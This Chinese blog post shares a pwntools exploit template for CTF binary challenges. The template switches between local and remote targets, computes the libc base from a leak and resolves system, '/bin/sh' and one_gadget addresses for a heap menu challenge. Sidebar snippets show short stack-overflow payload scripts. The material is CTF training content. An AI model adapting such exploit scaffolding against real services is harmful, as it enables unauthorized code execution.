【笔记】pwn模板

最新推荐文章于 2022-04-26 22:50:11 发布
最新推荐文章于 2022-04-26 22:50:11 发布
阅读量533 收藏 5
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/113921881
版权
这篇博客介绍了一种在本地和远程环境中切换调试的模板,特别适用于libc库不一致的情况。通过示例代码展示了如何利用pwn库进行进程控制、libc地址计算以及交互操作,最终达到getshell的目标。同时,文章中还包含了调试技巧,如设置断点和使用gdb进行交互式调试。
摘要由CSDN通过智能技术生成

今天在一个师傅博客中学到了一种当本地 libc 和远程 libc 不一样,调试和 getshell 之间需要切换的情况下,这种模板就会很简单。拿过来结合自己之前用的如下:

from pwn import *
import sys

context.log_level = "debug"
elf = ELF("./pwn")

if sys.argv[1] == "process":
   p = process("./pwn")
   libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
   p = remote("chall.pwnable.tw",10302)
   libc = ELF("./libc_64.so.6")

DEBUG = 0
if DEBUG:
	gdb.attach(p, 
	'''	
	b *0x08048935
	c
	''')

def dbg():
    gdb.attach(p)
    pause()

se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
rc      = lambda num          		:p.recv(num)
rl      = lambda                    :p.recvline()
ru      = lambda delims             :p.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\x00'))	
uu64    = lambda data               :u64(data.ljust(8, '\x00'))
info    = lambda tag, addr          :log.info(tag + " -> " + hex(addr))
ia		= lambda                    :p.interactive()

libc_base = u64(ru("\x7f")[-6:].ljust(8, '\x00')) - 0x68 - libc.symbols['__malloc_hook']
info("libc_base", libc_base)
malloc_hook = libc_base + libc.symbols['__malloc_hook']
free_hook = libc_base + libc.symbols['__free_hook']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + libc.search("/bin/sh").next()

menu = "Your choice : "
def cmd(idx):
	ru(menu)
	sl(str(idx))
	
def add(length, name, color='blue'):
	cmd(1)
	ru("Length of the name :")
	sl(str(length))
	ru("The name of flower :")
	se(name)
	ru("The color of the flower :")
	sl(color)

def show():
	cmd(2)

def remove(idx):
	cmd(3)
	ru("remove from the garden:")
	sl(str(idx))

def clear():
	cmd(4)

if sys.argv[1] == "process":
   one_gadget = libc_base + 0xf02a4
else:
   one_gadget = libc_base + 0xef6c4
   
ia()
、皮皮鸭
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
杨秀璋的专栏
03-19 1万+
作为Web渗透的初学者,Linux基础知识和常用命令是我们的必备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali或渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全(Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一篇文章,希望能够帮助到您!
ret2xx----- Pwn中常见的CTF模板命题
weixin_52321473的博客
04-07 1145
其实 这周末我原本是不想写文章的 主要是放假了 但是 我想往常一样登录了百度站长。。。。 我去!!! 我的文章被索引了!!!! 所以呢 我决定多更新点文章出来 而且最近不是有人说看不懂吗 我觉得更新一些可以让人懂的一些东西 但是今天 我还决定把Ret2讲完 本次教学节选于星梦安全团队在Bilibili上发表的视频 部分转载于https://www.anquanke.com/post/id/205858#h2-2 url为 https://www.bilibili.com/video/BV1Uv411j
一键搭建pwn环境脚本
03-25
一键搭建pwn环境脚本,安装pwntools, libc-database,vim, ropper, ROPgadget,libc-debug,ssh, one_gadget, pwndbg + pwngdb, 。其中pwntools为python3库 使用方法: chmod +x init_pwn.sh ./init_pwn.sh
CTF pwn普通UAF题目模板
半岛铁盒的博客
06-15 515
from pwn import * context(log_level=‘debug’) elf=ELF(’./) r=remote("","") #r=process(’./’) def create(size,content): r.sendlineafter("Your choice: ",‘1’) r.sendlineafter("Please input size: ",str(size)) r.sendafter("Please input content: ",content) def del
pwntools解题脚本模板
半岛铁盒的博客
02-23 1138
一.栈溢出 from pwn import * r = remote("111.198.29.45", 34012) #连接指定IP及端口,题目给定 payload = 'A' * 0x80 + 'a' * 0x8 + p64(0x00400596)#发送数据,输入数据溢出,并覆盖,返回到目标位置 r.recvuntil("字符串") #运行到字符串位置停下 r.sendline(payload) #发送 payload r.interactive()
BJDCTF YDSneedgirlfriend2.0 (UAF)
weixin_44864859的博客
07-23 252
前几天一直在学堆利用,现在来独立做些题试试水。 常见的菜单题,要注意的是tcache bin存取chunk的原则是先进先出的。 ida分析漏洞点 free掉chunk之后没有把指针置NULL,因此存在Used After Free漏洞。 大致利用思路是利用uaf漏洞实现对结构体chunk的改写,修改打印函数指针为我们的后门函数地址。具体利用方法不展开分析了。 Exp1: from pwn import * from LibcSearcher import LibcSearcher from sys im
pwntools生成的exp模版做了一些修改
weixin_30673611的博客
09-18 332
安装pwntools后,有一些命令行的工具可以用 ~ pwn template -h usage: pwn template [-h] [--host HOST] [--port PORT] [--user USER] [--pass PASSWORD] [--path PATH] [exe] ...
pwn学习笔记(一)
qq_41560595的博客
03-18 1492
ret2text: 程序中提供了后门函数,自己复写返回地址为后门函数地址。 .bss 、.data、.text三个段是elf文件在磁盘上本来就有的文件,进入到内存后仍然存在。PIE影响这三个部分。
Pwn
bluestar628的博客
07-11 2470
Pwn1拿到程序IDA分析发现就是一个输入字符串,长度大于0x500就直接执行cat flag。虽然溢出了,但是和溢出没有太大关系所以利用代码如下:from pwn import * p = remote ("139.224.220.67" ,30004) payload = 'a'*0x501 p.sendline(payload) p.interactive()Pwn2打开IDA分析,是一个经...
ctfshow刷题笔记pwn篇)
Gygert的博客
03-16 3497
一入pwn坑深似海,从此web是路人 目录pwn02pwn03 pwn02 常规checksec一下 扔进IDA 点进pwnme()函数看看,明显的栈溢出 搜索字符串有/bin/sh 直接淦它 from pwn import* io=remote('111.231.70.44',28054) #io=process('./pwn02') bin_sh=0x0804850F payload=b'a'*13+p32(bin_sh) io.sendline(payload) io.interactive(
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2053
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
【学习札记NO.00004】Linux Kernel Pwn学习笔记 I:一切开始之前
arttnba3的博客
02-25 572
【学习札记NO.00004】Linux Kernel Pwn学习笔记 I:一切开始之前[GITHUB BLOG ADDR](https://arttnba3.cn/2021/02/21/NOTE-0X02-LINUX-KERNEL-PWN-PART-I/)0x00.Linux Kernel Basic Knowledge一、内核内核架构:微内核 & 宏内核(单内核)宏内核(Monolithic Kernel,又叫单内核)微内核(Micro Kernel)二、分级保护域Intel Ring Model
一步一步学ROP Linux x86 学习笔记
chihie的博客
07-20 782
一步一步学ROP Linux x86 学习笔记 一无任何防护 二开启DEP 三开启DEP和ASLR 四开启DEP和ASLR无libc一步一步学ROP Linux x86 学习笔记这部分文章主要依据的是蒸米大神的一步一步学ROP系列文章,我也是跟着做的,本文主要记录其中的问题和实验没有成功的地方。一、无任何防护在github可以找到相关的资料,不用自己编译漏洞代码了,也有写好的exp。 从最基础的开
python3的pwn用法——when_did_you_born题解
Little_Small_Joze的博客
03-11 1701
检测截图 file when_did_you_born checksec when_did_you_born 我承认看到金丝雀+NX有那么一点点不开心,但是不影响。 反编译程序 根据上一步的file查看到它是64-bits的ELF文件,所以64-bits的IDA打开它,反编译找到主函数F5查看源代码。 __int64 __fastcall main(int a1, char **a2, char **a3) { __int64 result; // rax char v4[8]; // [rs
PWN学习总结(不断完善中)(有道云笔记
tbsqigongzi的博客
04-26 3392
学习路线 pwn一些概念理解 王爽汇编学习笔记 DOS-BOX及编译工具–百度网盘 提取码: ajba linux知识学习(CTF主要考察linux环境下的漏洞利用)—菜鸟教程 nala包管理命令(个人感觉比apt好用) python知识学习(写exp用)----菜鸟教程 gcc编译过程(了解一下) vim用法(好难,正在学) pacvim游戏 ctf-wiki-pwn漏洞利用总结图 刷题网站 BUUCTF BUUCTF—libc源码 攻防世界 pwn环境搭建 借用另一个博主的pwn环境配置文章 再加上几个
pwn 题GDB调试技巧和exp模板
推理小孩的博客
08-31 2582
pwn 题GDB调试技巧和exp模板 GDB分析ELF文件常用的调试技巧 gdb常用命令 首先是gbd+文件名 静态调试 ,gdb attach +文件名 动态调试 为了方便查看堆栈和寄存器 最好是安装peda插件 安装 可以通过pip直接安装,也可以从github上下载安装 $ pip install peda $ git clone h...
pwn——20180831
原味瓜子、的博客
09-01 1055
Get a shell , come on ! 题目:https://pan.baidu.com/s/1dTE2MxfBvVYTS0MhJwj_vw 提取码:7wbc 工具: 题解: 1、首先file stack_3一下,32位的,gdb ./stack_3一下,run一下,输入即报错。 用ida打开,点进main函数,f5编译一下,读一下吧。 2、 int __cdecl mai...
pwn by example学习笔记(一)
沐沐的博客
05-15 1426
通过一些例子来学习pwn,这些例子来自于github上的ctf-wiki pwn部分栈溢出原理(示例:ret2text)首先,获取要pwn的程序的基本信息这个程序是Linux下32位的elf格式的可执行文件,没有开启栈(stack)保护机制,没有开启nx了解了程序的基本信息以后,就运行下程序发现只有输入和输出,而且就只有一个输入点。放到ida里面去跑一下可以看到,gets从标准输入设备读字符串函数...
pwn20180830
原味瓜子、的博客
08-30 733
获得最高权限练习 题目:https://pan.baidu.com/s/1hsxnKkguZRPLPZqGI_y7_Q 提取码:n70j 工具:binwalk ida gdb 题解: 1、binwalk扫一下,32位的。跑一下,得到关键字。丢入ida看一下,反编译发现不管输入什么,都会输出之后结束 2、那么,这个考的是栈溢出和获取权限的知识了,首先,我们先得到s中最多能存多少...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值